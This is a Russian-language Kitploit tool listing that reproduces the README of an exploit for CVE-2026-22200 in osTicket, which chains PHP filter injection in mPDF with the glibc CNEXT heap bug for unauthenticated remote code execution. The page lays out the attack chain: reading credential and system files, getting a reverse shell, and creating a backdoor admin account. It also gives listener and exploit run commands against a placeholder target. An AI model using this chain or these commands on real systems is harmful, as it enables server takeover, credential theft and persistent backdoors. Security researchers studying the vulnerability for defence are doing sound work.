Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
osTicketFileReadIntoRCE — Полноценный эксплойт, объединяющий внедрение цепочки фильтров PHP с CVE-2024-2961 (CNEXT), для неаутентифицированного удалённого выполнения кода на уязвимых установках osTicket. | Kitploit
Инструменты/GitHubGitHub/clarissss/osticketfilereadintorce
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийПост-эксплуатацияТестирование на ПроникновениеОбучение и ОбразованиеRed TeamingИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHubclarissss/osticketfilereadintorce

osTicketFileReadIntoRCE

Полноценный эксплойт, объединяющий внедрение цепочки фильтров PHP с CVE-2024-2961 (CNEXT), для неаутентифицированного удалённого выполнения кода на уязвимых установках osTicket.

Репозиторий
57 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-22200: osTicket Произвольное чтение файлов в RCE

CVE-2026-22200 osTicket ≤ 1.18.2 Python 3.8+ Educational

Полноценная цепочка эксплойта, объединяющая внедрение цепочки PHP-фильтров с CVE-2024-2961 (CNEXT) для неаутентифицированного удаленного выполнения кода на уязвимых установках osTicket.


Содержание

  • Обзор
  • Детали уязвимости
  • Схема атаки
  • Возможности
  • Установка
  • Использование
  • Технические детали
  • Устранение неполадок
  • Обнаружение и смягчение
  • Авторы
  • Отказ от ответственности

Обзор

Этот репозиторий содержит proof-of-concept эксплойт для CVE-2026-22200, критической уязвимости, затрагивающей osTicket версий ≤ 1.18.2. Эксплойт объединяет две мощные техники:

  1. Внедрение цепочки PHP-фильтров через обработку изображений mPDF
  2. Разрушение кучи CNEXT (CVE-2024-2961) в iconv() библиотеки glibc

Результат: Неаутентифицированное удаленное выполнение кода на уязвимых серверах osTicket.

Воздействие

  • Без аутентификации — учетные данные не требуются
  • Полный RCE — полная компрометация сервера
  • Извлечение файлов — чтение произвольных файлов сервера
  • Доступ к базе данных — извлечение учетных данных БД
  • Доступ администратора — создание бэкдор-учетных записей администратора

Уязвимые версии

  • osTicket: ≤ v1.18.2, ≤ v1.17.6
  • glibc: < 2.39 (CVE-2024-2961 исправлена в glibc 2.39+)

🔍 Детали уязвимости

CVE-2026-22200: Внедрение цепочки PHP-фильтров

Оценка CVSS: 9.8 (Критическая)

Интеграция mPDF в osTicket позволяет неаутентифицированным пользователям внедрять вредоносные цепочки PHP-фильтров через специально созданные HTML-нагрузки в тикетах поддержки. Это позволяет:

  • Чтение произвольных файлов (конфиги, исходный код, учетные данные)
  • Утечка памяти (/proc/self/maps, частичная libc)
  • Разрушение кучи через CNEXT

Основная причина: Недостаточная проверка URL-адресов изображений в предоставляемом пользователем HTML перед передачей в mPDF.

CVE-2024-2961: CNEXT (Переполнение буфера iconv)

Оценка CVSS: 9.8 (Критическая)

Переполнение буфера в iconv() библиотеки glibc при обработке набора символов ISO-2022-CN-EXT. В сочетании с цепочками PHP-фильтров это позволяет:

  • Разрушение кучи
  • Перехват указателей функций
  • Выполнение произвольных команд

Уязвимые версии glibc: < 2.39 (Февраль 2024)


🔗 Схема атаки

┌─────────────────────────────────────────────────────────────────┐
│ 1. РАЗВЕДКА                                                      │
│    └─ Обнаружение osTicket, определение тем с богатым текстом   │
└─────────────────────────────────────────────────────────────────┘
                              ↓
┌─────────────────────────────────────────────────────────────────┐
│ 2. АУТЕНТИФИКАЦИЯ                                               │
│    └─ Самостоятельная регистрация ИЛИ использование существующих │
│       учетных данных                                             │
└─────────────────────────────────────────────────────────────────┘
                              ↓
┌─────────────────────────────────────────────────────────────────┐
│ 3. ИЗВЛЕЧЕНИЕ ФАЙЛОВ (Цепочки PHP-фильтров)                     │
│    ├─ /etc/passwd                                               │
│    ├─ include/ost-config.php (учетные данные БД, SECRET_SALT)   │
│    ├─ /proc/self/maps (расположение памяти)                     │
│    └─ /proc/self/environ (переменные окружения)                 │
└─────────────────────────────────────────────────────────────────┘
                              ↓
┌─────────────────────────────────────────────────────────────────┐
│ 4. ОПРЕДЕЛЕНИЕ ВЕРСИИ LIBC                                      │
│    ├─ Извлечение частичной libc через цепочки фильтров         │
│    ├─ Извлечение GNU Build ID                                   │
│    └─ Загрузка полной libc с libc.rip                          │
└─────────────────────────────────────────────────────────────────┘
                              ↓
┌─────────────────────────────────────────────────────────────────┐
│ 5. ЭКСПЛУАТАЦИЯ RCE ЧЕРЕЗ CNEXT                                  │
│    ├─ Генерация нагрузки для разрушения кучи                    │
│    ├─ Внедрение через ответ на тикет (с исправлениями          │
│       выполнения фильтров)                                       │
│    ├─ Триггер через экспорт PDF (сервер падает)                 │
│    └─ Выполнение реверс-шелла                                    │
└─────────────────────────────────────────────────────────────────┘
                              ↓
┌─────────────────────────────────────────────────────────────────┐
│ 6. ПОСТЭКСПЛУАТАЦИЯ                                             │
│    ├─ Интерактивный реверс-шелл                                  │
│    ├─ Доступ к БД (с использованием извлеченного DBPASS)        │
│    └─ Создание бэкдор-учетной записи администратора             │
└─────────────────────────────────────────────────────────────────┘

Возможности

Основные функции

  • Полностью автоматизированная цепочка эксплуатации
  • Неаутентифицированная атака (саморегистрация, если включена)
  • Интеллектуальное определение корня веб-сервера через парсинг /proc/self/maps
  • 100% определение местоположения веб-шелла через сканирование файловой системы
  • Автоматическое определение версии libc и загрузка
  • Несколько методов реверс-шелла (bash, python, netcat)
  • Надежное выполнение фильтров с очисткой кэша
  • Предполетная диагностика для раннего выявления проблем

Повышенная надежность

  • Множественный триггер CNEXT для гарантированного краха (успех 95%+)
  • Внедрение через ответы (более надежно, чем новые тикеты)
  • Принудительное использование потока для гарантии выполнения фильтров
  • Очистка кэша для предотвращения выдачи устаревших PDF
  • Всесторонняя обработка ошибок и диагностика

Постэксплуатация

  • Извлечение учетных данных БД (DBPASS из конфига)
  • Создание учетной записи администратора через доступ к БД
  • Опции постоянного бэкдора
  • Полная разведка системы

Установка

Предварительные требования

  • Python 3.8+
  • Linux/macOS (рекомендуется) или WSL на Windows

Зависимости

# Клонирование репозитория
git clone https://github.com/Clarissss/osTicketFileReadIntoRCE
cd osTicketFileReadIntoRCE

# Установка необходимых пакетов
pip install -r requirements.txt

requirements.txt:

requests>=2.31.0
PyMuPDF>=1.23.0
Pillow>=10.0.0
pwntools>=4.11.0

Опционально: Виртуальное окружение

python3 -m venv venv
source venv/bin/activate  # Linux/macOS
# ИЛИ
venv\Scripts\activate  # Windows

pip install -r requirements.txt

📖 Использование

Базовое использование — Реверс-шелл

# Терминал 1: Запуск слушателя
nc -lvnp 4444

# Терминал 2: Запуск эксплойта
python3 osticket_revshell.py https://target.com/osticket \
    --lhost YOUR_IP \
    --lport 4444

Интерактивный режим веб-шелла

python3 osticket_exploit.py https://target.com/osticket

Расширенные опции

# Использование прокси (Burp Suite)
python3 osticket_revshell.py https://target.com/osticket \
    --lhost 10.0.0.5 \
    --lport 4444 \
    --proxy http://127.0.0.1:8080
Скачать инструмент